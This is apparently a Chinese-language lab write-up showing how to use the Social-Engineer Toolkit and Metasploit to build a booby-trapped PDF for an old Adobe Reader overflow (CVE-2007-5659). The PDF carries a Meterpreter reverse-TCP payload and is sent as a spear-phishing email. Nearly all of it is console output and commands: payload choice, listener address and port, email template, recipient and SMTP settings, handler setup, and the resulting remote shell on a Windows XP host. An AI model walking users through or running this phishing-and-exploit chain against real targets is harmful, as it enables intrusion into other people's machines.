metasploit针对性钓鱼攻击向量入侵成功

环境：BT5R3，XP SP3，Adobe Reader 8.1.0

漏洞信息：http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659

Description
Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.

渗透测试：

root@bt:/pentest/exploits/set# ./set
Copyright 2012, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the distribution.
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.

Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.

Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
see the creator of SET in a bar, you are required to give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
holds the right to refuse the hug or the beer.

The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.

Do you agree to the terms of service [y/n]: y

.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI    "Y   MM    `7 P'   MM   `7
`MMb.       MM   d        MM
`YMMNq.   MMmmMM        MM
.     `MM   MM   Y  ,     MM
Mb     dM   MM     ,M     MM
P"Ybmmd"  .JMMmmmmMMM   .JMML.

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]        Development Team: JR DePre (pr1me)        [---]
[---]        Development Team: Joey Furr (j0fer)       [---]
[---]        Development Team: Thomas Werth            [---]
[---]        Development Team: Garland                 [---]
[---]                  Version: 3.6                    [---]
[---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
[---]        Report bugs: davek@trustedsec.com         [---]
[---]         Follow me on Twitter: dave_rel1k         [---]
[---]       Homepage: https://www.trustedsec.com       [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com 
Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1

01011001011011110111010100100000011100
10011001010110000101101100011011000111
10010010000001101000011000010111011001
10010100100000011101000110111100100000
01101101011101010110001101101000001000
00011101000110100101101101011001010010
00000110111101101110001000000111100101
10111101110101011100100010000001101000
01100001011011100110010001110011001000
00001110100010110100101001001000000101
01000110100001100001011011100110101101
11001100100000011001100110111101110010
00100000011101010111001101101001011011
10011001110010000001110100011010000110
01010010000001010011011011110110001101
10100101100001011011000010110101000101
01101110011001110110100101101110011001
01011001010111001000100000010101000110
11110110111101101100011010110110100101
11010000100000001010100110100001110101
011001110111001100101010

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]        Development Team: JR DePre (pr1me)        [---]
[---]        Development Team: Joey Furr (j0fer)       [---]
[---]        Development Team: Thomas Werth            [---]
[---]        Development Team: Garland                 [---]
[---]                  Version: 3.6                    [---]
[---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
[---]        Report bugs: davek@trustedsec.com         [---]
[---]         Follow me on Twitter: dave_rel1k         [---]
[---]       Homepage: https://www.trustedsec.com       [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com 
Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 1

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

set:phishing>1

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player "Button" Remote Code Execution
6) Adobe CoolType SING Table "uniqueName" Overflow
7) Adobe Flash Player "newfunction" Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Apple QuickTime PICT PnSize Buffer Overflow
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
19) Adobe Reader u3D Memory Corruption Vulnerability
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>8

1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2
set> IP address for the payload listener: 192.168.1.11
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[-] Generating fileformat exploit...

[*] Payload creation complete.
[*] All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

set:phishing>[*] Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1.  E-Mail Attack Single Email Address
2.  E-Mail Attack Mass Mailer

99. Return to main menu.

set:phishing>1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

set:phishing>1
[-] Available templates:
1: WOAAAA!!!!!!!!!! This is crazy...
2: How long has it been?
3: Have you seen this?
4: Baby Pics
5: Dan Brown's Angels & Demons
6: New Update
7: Order Confirmation
8: Computer Issue
9: Status Report
10: Strange internet usage from your computer
set:phishing>9
set:phishing> Send email to:feier7501@126.com

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

set:phishing>2
set:phishing> From address (ex: moo@example.com):********@qq.com
set:phishing> Username for open-relay [blank]:
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.qq.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:no
[!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.
Press {return} to view error message.
(503, 'Error: need EHLO and AUTH first !', '********@qq.com')
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:yes
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo...
the matrix has you
follow the white rabbit.

knock, knock, Neo.

(`.         ,-,
` `.    ,;' /
`.  ,'/ .'
`. X /.'
.-;--''--.._` ` (
.'            /   `
,           ` '   Q '
,         ,   `._    \
,.|         '     `-.;_'
:  . `  ;    `  ` --,.._;
' `    ,   )   .'
`._ ,  '   /_
; ,''-,;' ``-
``-..__``--`

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.11
LHOST => 192.168.1.11
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf  exploit(handler) >
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...

用邮件发送template.pdf失败了。我手动把template.pdf复制到XP上面。然后双击打开，此时打开很慢，内存消耗很大。过一会儿，连接打开了：

[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.142:1080) at 2013-04-28 04:02:39 -0400

msf  exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information                                      Connection
--  ----                   -----------                                      ----------
1   meterpreter x86/win32  ROOT-9743DD32E3\Administrator @ ROOT-9743DD32E3  192.168.1.11:443 -> 192.168.1.142:1080 (192.168.1.142)

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 828 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>

上面通过邮件发送失败了。如果直接进入邮箱来发送，则会报告病毒：